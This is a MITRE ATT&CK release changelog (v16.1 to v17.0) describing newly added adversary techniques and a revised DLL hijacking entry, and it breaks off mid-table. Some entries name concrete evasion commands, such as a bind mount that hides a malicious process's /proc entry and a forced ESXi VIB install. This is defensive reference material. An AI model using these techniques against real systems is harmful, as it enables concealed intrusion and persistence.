ATT&CK Changes Between v16.1 and v17.0
Key
- New objects: ATT&CK objects which are only present in the new release.
- Major version changes: ATT&CK objects that have a major version change. (e.g. 1.0 → 2.0)
- Minor version changes: ATT&CK objects that have a minor version change. (e.g. 1.0 → 1.1)
- Other version changes: ATT&CK objects that have a version change of any other kind. (e.g. 1.0 → 1.2)
- Patches: ATT&CK objects that have been patched while keeping the version the same. (e.g., 1.0 → 1.0 but something like a typo, a URL, or some metadata was fixed)
- Object revocations: ATT&CK objects which are revoked by a different object.
- Object deprecations: ATT&CK objects which are deprecated and no longer in use, and not replaced.
- Object deletions: ATT&CK objects which are no longer found in the STIX data.
| Colors for description field |
|---|
| Added |
| Changed |
| Deleted |
|
Additional formats
These ATT&CK Navigator layer files can be uploaded to ATT&CK Navigator manually.
This JSON file contains the machine readble output used to create this page: changelog.json
Techniques
enterprise-attack
New Techniques
[T1564.013] Hide Artifacts: Bind Mounts
Current version: 1.0
Description:
Adversaries may abuse bind mounts on file structures to hide their activity and artifacts from native utilities. A bind mount maps a directory or file from one location on the filesystem to another, similar to a shortcut on Windows. It’s commonly used to provide access to specific files or directories across different environments, such as inside containers or chroot environments, and requires sudo access.
Adversaries may use bind mounts to map either an empty directory or a benign /proc directory to a malicious process’s /proc directory. Using the commands mount –o bind /proc/benign-process /proc/malicious-process (or mount –B), the malicious process's /proc directory is overlayed with the contents of a benign process's /proc directory. When system utilities query process activity, such as ps and top, the kernel follows the bind mount and presents the benign directory’s contents instead of the malicious process's actual /proc directory. As a result, these utilities display information that appears to come from the benign process, effectively hiding the malicious process's metadata, executable, or other artifacts from detection.(Citation: Cado Security Commando Cat 2024)(Citation: Ahn Lab CoinMiner 2023)
[T1176.001] Software Extensions: Browser Extensions
Current version: 1.0
Description:
Adversaries may abuse internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality to and customize aspects of internet browsers. They can be installed directly via a local file or custom URL or through a browser's app store - an official online platform where users can browse, install, and manage extensions for a specific web browser. Extensions generally inherit the web browser's permissions previously granted.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores, so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary-controlled server or manipulate the mobile configuration file to silently install additional extensions.
Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles; however, .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)
Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension)
There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for Command and Control.(Citation: Stantinko Botnet)(Citation: Chrome Extension C2 Malware) Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for Defense Evasion.(Citation: Browers FriarFox)(Citation: Browser Adrozek)
[T1671] Cloud Application Integration
Current version: 1.0
Description:
Adversaries may achieve persistence by leveraging OAuth application integrations in a software-as-a-service environment. Adversaries may create a custom application, add a legitimate application into the environment, or even co-opt an existing integration to achieve malicious ends.(Citation: Push Security SaaS Persistence 2022)(Citation: SaaS Attacks GitHub Evil Twin Integrations)
OAuth is an open standard that allows users to authorize applications to access their information on their behalf. In a SaaS environment such as Microsoft 365 or Google Workspace, users may integrate applications to improve their workflow and achieve tasks.
Leveraging application integrations may allow adversaries to persist in an environment – for example, by granting consent to an application from a high-privileged adversary-controlled account in order to maintain access to its data, even in the event of losing access to the account.(Citation: Wiz Midnight Blizzard 2024)(Citation: Microsoft Malicious OAuth Applications 2022)(Citation: Huntress Persistence Microsoft 365 Compromise 2024) In some cases, integrations may remain valid even after the original consenting user account is disabled.(Citation: Push Security Slack Persistence 2023) Application integrations may also allow adversaries to bypass multi-factor authentication requirements through the use of Application Access Tokens. Finally, they may enable persistent Automated Exfiltration over time.(Citation: Synes Cyber Corner Malicious Azure Application 2023)
Creating or adding a new application may require the adversary to create a dedicated Cloud Account for the application and assign it Additional Cloud Roles – for example, in Microsoft 365 environments, an application can only access resources via an associated service principal.(Citation: Microsoft Entra ID Service Principals)
[T1027.015] Obfuscated Files or Information: Compression
Current version: 1.0
Description:
Adversaries may use compression to obfuscate their payloads or files. Compressed file formats such as ZIP, gzip, 7z, and RAR can compress and archive multiple files together to make it easier and faster to transfer files. In addition to compressing files, adversaries may also compress shellcode directly - for example, in order to store it in a Windows Registry key (i.e., Fileless Storage).(Citation: Trustwave Pillowmint June 2020)
In order to further evade detection, adversaries may combine multiple ZIP files into one archive. This process of concatenation creates an archive that appears to be a single archive but in fact contains the central directories of the embedded archives. Some ZIP readers, such as 7zip, may not be able to identify concatenated ZIP files and miss the presence of the malicious payload.(Citation: Perception Point)
File archives may be sent as one Spearphishing Attachment through email. Adversaries have sent malicious payloads as archived files to encourage the user to interact with and extract the malicious payload onto their system (i.e., Malicious File).(Citation: NTT Security Flagpro new December 2021) However, some file compression tools, such as 7zip, can be used to produce self-extracting archives. Adversaries may send self-extracting archives to hide the functionality of their payload and launch it without requiring multiple actions from the user.(Citation: The Hacker News)
Compression may be used in combination with Encrypted/Encoded File where compressed files are encrypted and password-protected.
[T1675] ESXi Administration Command
Current version: 1.0
Description:
Adversaries may abuse ESXi administration services to execute commands on guest machines hosted within an ESXi virtual environment. Persistent background services on ESXi-hosted VMs, such as the VMware Tools Daemon Service, allow for remote management from the ESXi server. The tools daemon service runs as vmtoolsd.exe on Windows guest operating systems, vmware-tools-daemon on macOS, and vmtoolsd on Linux.(Citation: Broadcom VMware Tools Services)
Adversaries may leverage a variety of tools to execute commands on ESXi-hosted VMs – for example, by using the vSphere Web Services SDK to programmatically execute commands and scripts via APIs such as StartProgramInGuest, ListProcessesInGuest, ListFileInGuest, and InitiateFileTransferFromGuest.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)(Citation: Broadcom Running Guest OS Operations) This may enable follow-on behaviors on the guest VMs, such as File and Directory Discovery, Data from Local System, or OS Credential Dumping.
[T1667] Email Bombing
Current version: 1.0
Description:
Adversaries may flood targeted email addresses with an overwhelming volume of messages. This may bury legitimate emails in a flood of spam and disrupt business operations.(Citation: sophos-bombing)(Citation: krebs-email-bombing)
An adversary may accomplish email bombing by leveraging an automated bot to register a targeted address for e-mail lists that do not validate new signups, such as online newsletters. The result can be a wave of thousands of e-mails that effectively overloads the victim’s inbox.(Citation: krebs-email-bombing)(Citation: hhs-email-bombing)
By sending hundreds or thousands of e-mails in quick succession, adversaries may successfully divert attention away from and bury legitimate messages including security alerts, daily business processes like help desk tickets and client correspondence, or ongoing scams.(Citation: hhs-email-bombing) This behavior can also be used as a tool of harassment.(Citation: krebs-email-bombing)
This behavior may be a precursor for Spearphishing Voice. For example, an adversary may email bomb a target and then follow up with a phone call to fraudulently offer assistance. This social engineering may lead to the use of Remote Access Software to steal credentials, deploy ransomware, conduct Financial Theft(Citation: sophos-bombing), or engage in other malicious activity.(Citation: rapid7-email-bombing)
[T1672] Email Spoofing
Current version: 1.0
Description:
Adversaries may fake, or spoof, a sender’s identity by modifying the value of relevant email headers in order to establish contact with victims under false pretenses.(Citation: Proofpoint TA427 April 2024) In addition to actual email content, email headers (such as the FROM header, which contains the email address of the sender) may also be modified. Email clients display these headers when emails appear in a victim's inbox, which may cause modified emails to appear as if they were from the spoofed entity.
This behavior may succeed when the spoofed entity either does not enable or enforce identity authentication tools such as Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and/or Domain-based Message Authentication, Reporting and Conformance (DMARC).(Citation: Cloudflare DMARC, DKIM, and SPF)(Citation: DMARC-overview)(Citation: Proofpoint-DMARC) Even if SPF and DKIM are configured properly, spoofing may still succeed when a domain sets a weak DMARC policy such as v=DMARC1; p=none; fo=1;. This means that while DMARC is technically present, email servers are not instructed to take any filtering action when emails fail authentication checks.(Citation: Proofpoint TA427 April 2024)(Citation: ic3-dprk)
Adversaries may abuse absent or weakly configured SPF, SKIM, and/or DMARC policies to conceal social engineering attempts(Citation: ic3-dprk) such as Phishing. They may also leverage email spoofing for Impersonation of legitimate external individuals and organizations, such as journalists and academics.(Citation: ic3-dprk)
[T1668] Exclusive Control
Current version: 1.0
Description:
Adversaries who successfully compromise a system may attempt to maintain persistence by “closing the door” behind them – in other words, by preventing other threat actors from initially accessing or maintaining a foothold on the same system.
For example, adversaries may patch a vulnerable, compromised system(Citation: Mandiant-iab-control)(Citation: CERT AT Fortinent Ransomware 2025) to prevent other threat actors from leveraging that vulnerability in the future. They may “close the door” in other ways, such as disabling vulnerable services(Citation: sophos-multiple-attackers), stripping privileges from accounts(Citation: aquasec-postgres-processes), or removing other malware already on the compromised device.(Citation: fsecure-netsky)
Hindering other threat actors may allow an adversary to maintain sole access to a compromised system or network. This prevents the threat actor from needing to compete with or even being removed themselves by other threat actors. It also reduces the “noise” in the environment, lowering the possibility of being caught and evicted by defenders. Finally, in the case of Resource Hijacking, leveraging a compromised device’s full power allows the threat actor to maximize profit.(Citation: sophos-multiple-attackers)
[T1564.014] Hide Artifacts: Extended Attributes
Current version: 1.0
Description:
Adversaries may abuse extended attributes (xattrs) on macOS and Linux to hide their malicious data in order to evade detection. Extended attributes are key-value pairs of file and directory metadata used by both macOS and Linux. They are not visible through standard tools like Finder, ls, or cat and require utilities such as xattr (macOS) or getfattr (Linux) for inspection. Operating systems and applications use xattrs for tagging, integrity checks, and access control. On Linux, xattrs are organized into namespaces such as user. (user permissions), trusted. (root permissions), security., and system., each with specific permissions. On macOS, xattrs are flat strings without namespace prefixes, commonly prefixed with com.apple.* (e.g., com.apple.quarantine, com.apple.metadata:_kMDItemUserTags) and used by system features like Gatekeeper and Spotlight.(Citation: Establishing persistence using extended attributes on Linux)
An adversary may leverage xattrs by embedding a second-stage payload into the extended attribute of a legitimate file. On macOS, a payload can be embedded into a custom attribute using the xattr command. A separate loader can retrieve the attribute with xattr -p, decode the content, and execute it using a scripting interpreter. On Linux, an adversary may use setfattr to write a payload into the user. namespace of a legitimate file. A loader script can later extract the payload with getfattr --only-values, decode it, and execute it using bash or another interpreter. In both cases, because the primary file content remains unchanged, security tools and integrity checks that do not inspect extended attributes will observe the original file hash, allowing the malicious payload to evade detection.(Citation: Low GroupIB xattrs nov 2024)
[T1059.012] Command and Scripting Interpreter: Hypervisor CLI
Current version: 1.0
Description:
Adversaries may abuse hypervisor command line interpreters (CLIs) to execute malicious commands. Hypervisor CLIs typically enable a wide variety of functionality for managing both the hypervisor itself and the guest virtual machines it hosts.
For example, on ESXi systems, tools such as esxcli and vim-cmd allow administrators to configure firewall rules and log forwarding on the hypervisor, list virtual machines, start and stop virtual machines, and more.(Citation: Broadcom ESXCLI Reference)(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: LOLESXi) Adversaries may be able to leverage these tools in order to support further actions, such as File and Directory Discovery or Data Encrypted for Impact.
[T1176.002] Software Extensions: IDE Extensions
Current version: 1.0
Description:
Adversaries may abuse an integrated development environment (IDE) extension to establish persistent access to victim systems.(Citation: Mnemonic misuse visual studio) IDEs such as Visual Studio Code, IntelliJ IDEA, and Eclipse support extensions - software components that add features like code linting, auto-completion, task automation, or integration with tools like Git and Docker. A malicious extension can be installed through an extension marketplace (i.e., Compromise Software Dependencies and Development Tools) or side-loaded directly into the IDE.(Citation: Abramovsky VSCode Security)(Citation: Lakshmanan Visual Studio Marketplace)
In addition to installing malicious extensions, adversaries may also leverage benign ones. For example, adversaries may establish persistent SSH tunnels via the use of the VSCode Remote SSH extension (i.e., IDE Tunneling).
Trust is typically established through the installation process; once installed, the malicious extension is run every time that the IDE is launched. The extension can then be used to execute arbitrary code, establish a backdoor, mine cryptocurrency, or exfiltrate data.(Citation: ExtensionTotal VSCode Extensions 2025)
[T1219.001] Remote Access Tools: IDE Tunneling
Current version: 1.0
Description:
Adversaries may abuse Integrated Development Environment (IDE) software with remote development features to establish an interactive command and control channel on target systems within a network. IDE tunneling combines SSH, port forwarding, file sharing, and debugging into a single secure connection, letting developers work on remote systems as if they were local. Unlike SSH and port forwarding, IDE tunneling encapsulates an entire session and may use proprietary tunneling protocols alongside SSH, allowing adversaries to blend in with legitimate development workflows. Some IDEs, like Visual Studio Code, also provide CLI tools (e.g., code tunnel) that adversaries may use to programmatically establish tunnels and generate web-accessible URLs for remote access. These tunnels can be authenticated through accounts such as GitHub, enabling the adversary to control the compromised system via a legitimate developer portal.(Citation: sentinelone operationDigitalEye Dec 2024)(Citation: Unit42 Chinese VSCode 06 September 2024)(Citation: Thornton tutorial VSCode shell September 2023)
Additionally, adversaries may use IDE tunneling for persistence. Some IDEs, such as Visual Studio Code and JetBrains, support automatic reconnection. Adversaries may configure the IDE to auto-launch at startup, re-establishing the tunnel upon execution. Compromised developer machines may also be exploited as jump hosts to move further into the network.
IDE tunneling tools may be built-in or installed as IDE Extensions.
[T1674] Input Injection
Current version: 1.0
Description:
Adversaries may simulate keystrokes on a victim’s computer by various means to perform any type of action on behalf of the user, such as launching the command interpreter using keyboard shortcuts, typing an inline script to be executed, or interacting directly with a GUI-based application. These actions can be preprogrammed into adversary tooling or executed through physical devices such as Human Interface Devices (HIDs).
For example, adversaries have used tooling that monitors the Windows message loop to detect when a user visits bank-specific URLs. If detected, the tool then simulates keystrokes to open the developer console or select the address bar, pastes malicious JavaScript from the clipboard, and executes it - enabling manipulation of content within the browser, such as replacing bank account numbers during transactions.(Citation: BleepingComputer BackSwap)(Citation: welivesecurity BackSwap)
Adversaries have also used malicious USB devices to emulate keystrokes that launch PowerShell, leading to the download and execution of malware from adversary-controlled servers.(Citation: BleepingComputer USB)
[T1127.003] Trusted Developer Utilities Proxy Execution: JamPlus
Current version: 1.0
Description:
Adversaries may use JamPlus to proxy the execution of a malicious script. JamPlus is a build utility tool for code and data build systems. It works with several popular compilers and can be used for generating workspaces in code editors such as Visual Studio.(Citation: JamPlus manual)
Adversaries may abuse the JamPlus build utility to execute malicious scripts via a .jam file, which describes the build process and required dependencies. Because the malicious script is executed from a reputable developer tool, it may subvert application control security systems such as Smart App Control.(Citation: Cyble)(Citation: Elastic Security Labs)
[T1027.016] Obfuscated Files or Information: Junk Code Insertion
Current version: 1.0
Description:
Adversaries may use junk code / dead code to obfuscate a malware’s functionality. Junk code is code that either does not execute, or if it does execute, does not change the functionality of the code. Junk code makes analysis more difficult and time-consuming, as the analyst steps through non-functional code instead of analyzing the main code. It also may hinder detections that rely on static code analysis due to the use of benign functionality, especially when combined with Compression or Software Packing.(Citation: ReasonLabs)(Citation: ReasonLabs Cyberpedia Junk Code)
No-Operation (NOP) instructions are an example of dead code commonly used in x86 assembly language. They are commonly used as the 0x90 opcode. When NOPs are added to malware, the disassembler may show the NOP instructions, leading to the analyst needing to step through them.(Citation: ReasonLabs)
The use of junk / dead code insertion is distinct from Binary Padding because the purpose is to obfuscate the functionality of the code, rather than simply to change the malware’s signature.
[T1204.004] User Execution: Malicious Copy and Paste
Current version: 1.0
Description:
An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a Command and Scripting Interpreter.
Malicious websites, such as those used in Drive-by Compromise, may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)
Adversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution.(Citation: Proofpoint ClickFix 2024)
Tricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files.
[T1036.011] Masquerading: Overwrite Process Arguments
Current version: 1.0
Description:
Adversaries may modify a process's in-memory arguments to change its name in order to appear as a legitimate or benign process. On Linux, the operating system stores command-line arguments in the process’s stack and passes them to the main() function as the argv array. The first element, argv[0], typically contains the process name or path - by default, the command used to actually start the process (e.g., cat /etc/passwd). By default, the Linux /proc filesystem uses this value to represent the process name. The /proc/<PID>/cmdline file reflects the contents of this memory, and tools like ps use it to display process information. Since arguments are stored in user-space memory at launch, this modification can be performed without elevated privileges.
During runtime, adversaries can erase the memory used by all command-line arguments for a process, overwriting each argument string with null bytes. This removes evidence of how the process was originally launched. They can then write a spoofed string into the memory region previously occupied by argv[0] to mimic a benign command, such as cat resolv.conf. The new command-line string is reflected in /proc/<PID>/cmdline and displayed by tools like ps.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022)
[T1219.003] Remote Access Tools: Remote Access Hardware
Current version: 1.0
Description:
An adversary may use legitimate remote access hardware to establish an interactive command and control channel to target systems within networks. These services, including IP-based keyboard, video, or mouse (KVM) devices such as TinyPilot and PiKVM, are commonly used as legitimate tools and may be allowed by peripheral device policies within a target environment.
Remote access hardware may be physically installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote session with the target system. Using hardware-based remote access tools may allow threat actors to bypass software security solutions and gain more control over the compromised device(s).(Citation: Palo Alto Unit 42 North Korean IT Workers 2024)(Citation: Google Cloud Threat Intelligence DPRK IT Workers 2024)
[T1219.002] Remote Access Tools: Remote Desktop Software
Current version: 1.0
Description:
An adversary may use legitimate desktop support software to establish an interactive command and control channel to target systems within networks. Desktop support software provides a graphical interface for remotely controlling another computer, transmitting the display output, keyboard input, and mouse control between devices using various protocols. Desktop support software, such as VNC, Team Viewer, AnyDesk, ScreenConnect, LogMein, AmmyyAdmin, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)
Remote access modules/features may also exist as part of otherwise existing software such as Zoom or Google Chrome’s Remote Desktop.(Citation: Google Chrome Remote Desktop)(Citation: Chrome Remote Desktop)
[T1027.017] Obfuscated Files or Information: SVG Smuggling
Current version: 1.0
Description:
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign SVG files.(Citation: Trustwave SVG Smuggling 2025) SVGs, or Scalable Vector Graphics, are vector-based image files constructed using XML. As such, they can legitimately include <script> tags that enable adversaries to include malicious JavaScript payloads. However, SVGs may appear less suspicious to users than other types of executable files, as they are often treated as image files.
SVG smuggling can take a number of forms. For example, threat actors may include content that:
- Assembles malicious payloads(Citation: Talos SVG Smuggling 2022)
- Downloads malicious payloads(Citation: Cofense SVG Smuggling 2024)
- Redirects users to malicious websites(Citation: Bleeping Computer SVG Smuggling 2024)
- Displays interactive content to users, such as fake login forms and download buttons.(Citation: Bleeping Computer SVG Smuggling 2024)
SVG Smuggling may be used in conjunction with HTML Smuggling where an SVG with a malicious payload is included inside an HTML file.(Citation: Talos SVG Smuggling 2022) SVGs may also be included in other types of documents, such as PDFs.
[T1569.003] System Services: Systemctl
Current version: 1.0
Description:
Adversaries may abuse systemctl to execute commands or programs. Systemctl is the primary interface for systemd, the Linux init system and service manager. Typically invoked from a shell, Systemctl can also be integrated into scripts or applications.
Adversaries may use systemctl to execute commands or programs as Systemd Services. Common subcommands include: systemctl start, systemctl stop, systemctl enable, systemctl disable, and systemctl status.(Citation: Red Hat Systemctl 2022)
[T1673] Virtual Machine Discovery
Current version: 1.0
Description:
An adversary may attempt to enumerate running virtual machines (VMs) after gaining access to a host or hypervisor. For example, adversaries may enumerate a list of VMs on an ESXi hypervisor using a Hypervisor CLI such as esxcli or vim-cmd (e.g. esxcli vm process list or vim-cmd vmsvc/getallvms).(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: TrendMicro Play) Adversaries may also directly leverage a graphical user interface, such as VMware vCenter, in order to view virtual machines on a host.
Adversaries may use the information from Virtual Machine Discovery during discovery to shape follow-on behaviors. Subsequently discovered VMs may be leveraged for follow-on activities such as Service Stop or Data Encrypted for Impact.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)
[T1669] Wi-Fi Networks
Current version: 1.0
Description:
Adversaries may gain initial access to target systems by connecting to wireless networks. They may accomplish this by exploiting open Wi-Fi networks used by target devices or by accessing secured Wi-Fi networks — requiring Valid Accounts — belonging to a target organization.(Citation: DOJ GRU Charges 2018)(Citation: Nearest Neighbor Volexity) Establishing a connection to a Wi-Fi access point requires a certain level of proximity to both discover and maintain a stable network connection.
Adversaries may establish a wireless connection through various methods, such as by physically positioning themselves near a Wi-Fi network to conduct close access operations. To bypass the need for physical proximity, adversaries may attempt to remotely compromise nearby third-party systems that have both wired and wireless network connections available (i.e., dual-homed systems). These third-party compromised devices can then serve as a bridge to connect to a target’s Wi-Fi network.(Citation: Nearest Neighbor Volexity)
Once an initial wireless connection is achieved, adversaries may leverage this access for follow-on activities in the victim network or further targeting of specific devices on the network. Adversaries may perform Network Sniffing or Adversary-in-the-Middle activities for Credential Access or Discovery.
[T1505.006] Server Software Component: vSphere Installation Bundles
Current version: 1.0
Description:
Adversaries may abuse vSphere Installation Bundles (VIBs) to establish persistent access to ESXi hypervisors. VIBs are collections of files used for software distribution and virtual system management in VMware environments. Since ESXi uses an in-memory filesystem where changes made to most files are stored in RAM rather than in persistent storage, these modifications are lost after a reboot. However, VIBs can be used to create startup tasks, apply custom firewall rules, or deploy binaries that persist across reboots. Typically, administrators use VIBs for updates and system maintenance.
VIBs can be broken down into three components:(Citation: VMware VIBs)
- VIB payload: a
.vgz archive containing the directories and files to be created and executed on boot when the VIBs are loaded.
- Signature file: verifies the host acceptance level of a VIB, indicating what testing and validation has been done by VMware or its partners before publication of a VIB. By default, ESXi hosts require a minimum acceptance level of PartnerSupported for VIB installation, meaning the VIB is published by a trusted VMware partner. However, privileged users can change the default acceptance level using the
esxcli command line interface. Additionally, VIBs are able to be installed regardless of acceptance level by using the esxcli software vib install --force command.
- XML descriptor file: a configuration file containing associated VIB metadata, such as the name of the VIB and its dependencies.
Adversaries may leverage malicious VIB packages to maintain persistent access to ESXi hypervisors, allowing system changes to be executed upon each bootup of ESXi – such as using esxcli to enable firewall rules for backdoor traffic, creating listeners on hard coded ports, and executing backdoors.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022) Adversaries may also masquerade their malicious VIB files as PartnerSupported by modifying the XML descriptor file.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)
Major Version Changes
[T1574.001] Hijack Execution Flow: DLL
Current version: 2.0
Version changed from: 1.3 → 2.0
|
|
|---|
| t | Adversaries may execute their own malicious payloads by hija | t | Adversaries may abuse dynamic-link library files (DLLs) in o |
| cking the search order used to load DLLs. Windows systems us | | rder to achieve persistence, escalate privileges, and evade |
| e a common method to look for required DLLs to load into a p | | defenses. DLLs are libraries that contain code and data that |
| rogram. (Citation: Microsoft Dynamic Link Library Search Ord | | can be simultaneously utilized by multiple programs. While |
| er)(Citation: FireEye Hijacking July 2010) Hijacking DLL loa | | DLLs are not malicious by nature, they can be abused through |
| ds may be for the purpose of establishing persistence as wel | | mechanisms such as side-loading, hijacking search order, an |
| l as elevating privileges and/or evading restrictions on fil | | d phantom DLL hijacking.(Citation: unit 42) Specific ways D |
| e execution. There are many ways an adversary can hijack DL | | LLs are abused by adversaries include: ### DLL Sideloading |
| L loads. Adversaries may plant trojan dynamic-link library f | | Adversaries may execute their own malicious payloads by side |
| iles (DLLs) in a directory that will be searched before the | | -loading DLLs. Side-loading involves hijacking which DLL a p |
| location of a legitimate library that will be requested by a | | rogram loads by planting and then invoking a legitimate appl |
| program, causing Windows to load their malicious library wh | | ication that executes their payload(s). Side-loading positi |
| en it is called for by the victim program. Adversaries may a | | ons both the victim application and malicious payload(s) alo |
| lso perform DLL preloading, also called binary planting atta | | ngside each other. Adversaries likely use side-loading as a |
| cks, (Citation: OWASP Binary Planting) by placing a maliciou | | means of masking actions they perform under a legitimate, tr |
| s DLL with the same name as an ambiguously specified DLL in | | usted, and potentially elevated system or software process. |
| a location that Windows searches before the legitimate DLL. | | Benign executables used to side-load payloads may not be fla |
| Often this location is the current working directory of the | | gged during delivery and/or execution. Adversary payloads ma |
| program.(Citation: FireEye fxsst June 2011) Remote DLL prelo | | y also be encrypted/packed or otherwise obfuscated until loa |
| ading attacks occur when a program sets its current director | | ded into the memory of the trusted process. Adversaries may |
| y to a remote location such as a Web share before loading a | | also side-load other packages, such as BPLs (Borland Packag |
| DLL. (Citation: Microsoft Security Advisory 2269637) Phanto | | e Library).(Citation: kroll bpl) ### DLL Search Order Hijac |
| m DLL hijacking is a specific type of DLL search order hijac | | king Adversaries may execute their own malicious payloads by |
| king where adversaries target references to non-existent DLL | | hijacking the search order that Windows uses to load DLLs. |
| files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversar | | This search order is a sequence of special and standard sear |
| ies Hijack DLLs) They may be able to load their own maliciou | | ch locations that a program checks when loading a DLL. An ad |
| s DLL by planting it with the correct name in the location o | | versary can plant a trojan DLL in a directory that will be p |
| f the missing module. Adversaries may also directly modify | | rioritized by the DLL search order over the location of a le |
| the search order via DLL redirection, which after being enab | | gitimate library. This will cause Windows to load the malici |
| led (in the Registry and creation of a redirection file) may | | ous DLL when it is called for by the victim program.(Citatio |
| cause a program to load a different DLL.(Citation: Microsof | | n: unit 42) ### DLL Redirection Adversaries may directly mo |
| t Dynamic-Link Library Redirection)(Citation: Microsoft Mani | | dify the search order via DLL redirection, which after being |
| fests)(Citation: FireEye DLL Search Order Hijacking) If a s | | enabled (in the Registry or via the creation of a redirecti |
| earch order-vulnerable program is configured to run at a hig | | on file) may cause a program to load a DLL from a different |
| her privilege level, then the adversary-controlled DLL that | | location.(Citation: Microsoft redirection)(Citation: Microso |
| is loaded will also be executed at the higher level. In this | | ft - manifests/assembly) ### Phantom DLL Hijacking Adversar |
| case, the technique could be used for privilege escalation | | ies may leverage phantom DLL hijacking by targeting referenc |
| from user to administrator or SYSTEM or from administrator t | | es to non-existent DLL files. They may be able to load their |
| o SYSTEM, depending on the program. Programs that fall victi | | own malicious DLL by planting it with the correct name in t |
| m to path hijacking may appear to behave normally because ma | | he location of the missing module.(Citation: Hexacorn DLL Hi |
| licious DLLs may be configured to also load the legitimate D | | jacking)(Citation: Hijack DLLs CrowdStrike) ### DLL Substit |
| LLs they were meant to replace. | | ution Adversaries may target existing, valid DLL files and s |
| | | ubstitute them with their own malicious DLLs, planting them |
| | | with the same name and in the same location as the valid DLL |
| | | file.(Citation: Wietze Beukema DLL Hijacking) Programs tha |
| | | t fall victim to DLL hijacking may appear to behave normally |
| | | because malicious DLLs may be configured to also load the l |
| | | egitimate DLLs they were meant to replace, evading defenses. |
| | | Remote DLL hijacking can occur when a program sets its cur |
| | | rent directory to a remote location, such as a Web share, be |
| | | fore loading a DLL.(Citation: dll pre load owasp)(Citation: |
| | | microsoft remote preloading) If a valid DLL is configured t |
| | | o run at a higher privilege level, then the adversary-contro |
| | | lled DLL that is loaded will also be executed at the higher |
| | | level. In this case, the technique could be used for privile |
| | | ge escalation. |
New Mitigations:
- M1013: Application Developer Guidance
- M1051: Update Software
New Detections:
- DS0009: Process (Process Creation)
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-30 17:32:59.948000+00:00 | 2025-04-16 18:24:47.533000+00:00 |
| name | DLL Search Order Hijacking | DLL |
| description | Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. | Adversaries may abuse dynamic-link library files (DLLs) in order to achieve persistence, escalate privileges, and evade defenses. DLLs are libraries that contain code and data that can be simultaneously utilized by multiple programs. While DLLs are not malicious by nature, they can be abused through mechanisms such as side-loading, hijacking search order, and phantom DLL hijacking.(Citation: unit 42)
Specific ways DLLs are abused by adversaries include:
### DLL Sideloading
